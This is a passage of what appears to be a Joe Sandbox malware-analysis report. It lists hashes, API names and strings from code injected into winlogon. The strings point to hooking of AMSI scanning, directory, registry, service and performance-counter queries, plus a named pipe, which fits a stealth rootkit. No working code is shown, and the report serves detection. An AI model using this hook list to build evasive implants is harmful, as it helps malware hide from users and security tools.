                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction ID: ef80b3d61712d37991047624d5b70c5c4d71fb90542e1b129de85fb681dee4ce
                                                        • Opcode Fuzzy Hash: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction Fuzzy Hash: 08318F76219F90E6EB608FA4E8543EE7364F788B45F44852ADB4E47B98DF38C548C710
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction ID: 05cd3e160029e1e732615cc7e20f52405f780a1c2cb12fa09db82b9c2cc8f869
                                                        • Opcode Fuzzy Hash: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction Fuzzy Hash: 7231853A218F90A6DB60CF69E8447DE73A4F788B55F544526EB8E43BA8DF38C145CB00
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite$ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 1443284424-0
                                                        • Opcode ID: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction ID: 03c8dc79bdc2999bb57e8ee348579c7cb0382e07fa747561d973084f905eb7f7
                                                        • Opcode Fuzzy Hash: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction Fuzzy Hash: C3E1127A728FA0AAE700CFA8D4882DD7BB1F745B89F24C116DE4E57B99DA34C416C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000003.1759673624.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_3_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                        • API String ID: 3215553584-1407779936
                                                        • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction ID: 734ea35669d024df06483749a34a66f9902071fdec98b16f48637ea73e98c1c2
                                                        • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction Fuzzy Hash: 085106AA712FA4A5EF10CFEA98096AD27A1F788BD6F54C525EF0D07B85DA38C045C300

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 00000225DC641D47
                                                          • Part of subcall function 00000225DC6420C0: GetModuleHandleA.KERNEL32(?,?,?,00000225DC641D79), ref: 00000225DC6420D8
                                                          • Part of subcall function 00000225DC6420C0: GetProcAddress.KERNEL32(?,?,?,00000225DC641D79), ref: 00000225DC6420E9
                                                          • Part of subcall function 00000225DC645F50: GetCurrentThreadId.KERNEL32 ref: 00000225DC645F8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                        • API String ID: 4175298099-4225371247
                                                        • Opcode ID: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction ID: 7335be69b1a53d8260e79aad09e49a57f4a9151297e2b9092e57277930a4543d
                                                        • Opcode Fuzzy Hash: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction Fuzzy Hash: 794185AC128D7AB0FA05DFDDE9597E43765A704B47FB1C453A41A031B69E38C28EC361

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction ID: 4323ca25779d84a57c3c02923ca7ebc8007b87c3c86119a3830bb68bec69c950
                                                        • Opcode Fuzzy Hash: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction Fuzzy Hash: 81514D76214F9496E724CFBAE44C35A77A1F788F9AF148524DA4A07758DF3CC049CB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000003.1759673624.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_3_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: bad array new length
                                                        • API String ID: 190073905-1242854226
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: 9a4c01e7eb6cd6e3cc95c39396cf0bee9793080e8f643e4f7ddbe8a1a9e0a88d
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: E381442D616E61BAFF10AFEE944D35963E1EB61783F54C115EA49437A6DF38C842CB00

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Running Time
                                                        • API String ID: 1943346504-1805530042
                                                        • Opcode ID: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction ID: 0912822af30d12dff6b279402dbf66905d85d22777380dab2996b8327d9d6299
                                                        • Opcode Fuzzy Hash: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction Fuzzy Hash: B831B926618E65A6F720DFAAE80C359B3A0FB88FD7F548635DE4A43624DF38C455C740

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Utilization Percentage
                                                        • API String ID: 1943346504-3507739905
                                                        • Opcode ID: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction ID: 1a7a96c60956b87603b2adbb43b019170631b1eac3662604c8114e2770feac5a
                                                        • Opcode Fuzzy Hash: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction Fuzzy Hash: 4D317EA9628F65E6E750DFAAA84C75A73A1FB84F86F148535DE4B43724DF38C405C700

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProclstrlen
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 3607816002-3850299575
                                                        • Opcode ID: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction ID: 076814e57d21d2f3b3b410e77ef8730c28811e2173efb051d51587c31ad11a7d
                                                        • Opcode Fuzzy Hash: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction Fuzzy Hash: 50A1D33A21CFA1A2EB5ACFD9D4087A977A5F744B86F648056DE4A53B98DF34CC81C340

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction ID: 10060b41cb260af303b6ab6ddc9c0c8c5baff40587f29c1b63fca46e6a133ab5
                                                        • Opcode Fuzzy Hash: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction Fuzzy Hash: 21418037218F90D6E760CFA6E44839E77A1F388B89F54C129DA8A47B58DF38C549CB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                        • String ID: \\.\pipe\Deadchildproc
                                                        • API String ID: 166002920-2259481039
                                                        • Opcode ID: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction ID: 92c08f6cc4004cb3f8b5e1b06263060720a831a650563b72dd941ce804ecb253
                                                        • Opcode Fuzzy Hash: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction Fuzzy Hash: 00114C3A628F5093E7108F69F44875A7761F389FD6F608325EA5A06AA8CF3CC548CB00
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                         • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: e087d9ff1dacb74b7fa59f56ad70c442499e53cc6abe087a9cef841b2c5c687b
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: 1081052D61CF72B6FB50ABED944D3993290AB45B82F14C5A5EA07837D6DB38C946CB00
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(?,?,?,00000225DC649AEF,?,?,?,00000225DC6498B4,?,?,?,?,00000225DC6494A5), ref: 00000225DC6499B5
                                                        • GetLastError.KERNEL32(?,?,?,00000225DC649AEF,?,?,?,00000225DC6498B4,?,?,?,?,00000225DC6494A5), ref: 00000225DC6499C3
                                                        • LoadLibraryExW.KERNEL32(?,?,?,00000225DC649AEF,?,?,?,00000225DC6498B4,?,?,?,?,00000225DC6494A5), ref: 00000225DC6499ED
                                                        • FreeLibrary.KERNEL32(?,?,?,00000225DC649AEF,?,?,?,00000225DC6498B4,?,?,?,?,00000225DC6494A5), ref: 00000225DC649A33
                                                        • GetProcAddress.KERNEL32(?,?,?,00000225DC649AEF,?,?,?,00000225DC6498B4,?,?,?,?,00000225DC6494A5), ref: 00000225DC649A3F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                         • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction ID: 24c979095fe9684387ee1b36362df099c9b39658b339583492920f750c380cbb
                                                        • Opcode Fuzzy Hash: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction Fuzzy Hash: 3931E53935EF60B0EE25EB8AA4087997398F744F66F198524DD2E07798DF38C486C300
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                         • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction ID: 5be9f3384d91eae15bd275903a3f580668a63c88c2dfc0f2a84967b766097804
                                                        • Opcode Fuzzy Hash: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction Fuzzy Hash: 70118236320F6096E7509B9AE84871972A0F788FE6F648225EE5D87794DF78C844C740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                         • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: Dead
                                                        • API String ID: 756756679-1293411866
                                                        • Opcode ID: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction ID: b484f878597e3c1c40b0e3d2b5235eaf3506be0ad65e160053fa1907a731befa
                                                        • Opcode Fuzzy Hash: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction Fuzzy Hash: D331C02971DF65A2EA21DFEAA44836A73A0FB54F81F04C5309F8A07B54EF38C4A5C700
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                         • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction ID: ba70d0768b3d9f561e044f18bf1f68bc2228eff5c97a5342605f90c4b2ec84b1
                                                        • Opcode Fuzzy Hash: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction Fuzzy Hash: F1016D39318F50A2EB10DB9AA85835963A1F788FC1F588534DE4E43758DF3CC585C740
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                         • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction ID: c92eea84b00c9f903c707425f6f7cf6861390332b5c52ba7c555f9c9e54a20de
                                                        • Opcode Fuzzy Hash: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction Fuzzy Hash: 9F111729325F60A6EB259FA9E80C71A73A0AB58F46F248934C94D47764EF3DC548C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                         • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction ID: fbbe23e74c16a92c052ec9dd558afad9badb573f34104f68d1e6396a38e464ad
                                                        • Opcode Fuzzy Hash: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction Fuzzy Hash: E9F04466318EA1A2E7208F69F89C3596760F744F89F94C030DA4946954DF7CC689C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                         • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction ID: c4f516db2d58fdcf09ade6254635e81a5d9be160786ec31a530a94dc5a945ec3
                                                        • Opcode Fuzzy Hash: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction Fuzzy Hash: 54F08228318FA4A2EB108B9BB9081296621AB48FD2F18C531DE5A07B68CE3CC481C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                         • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
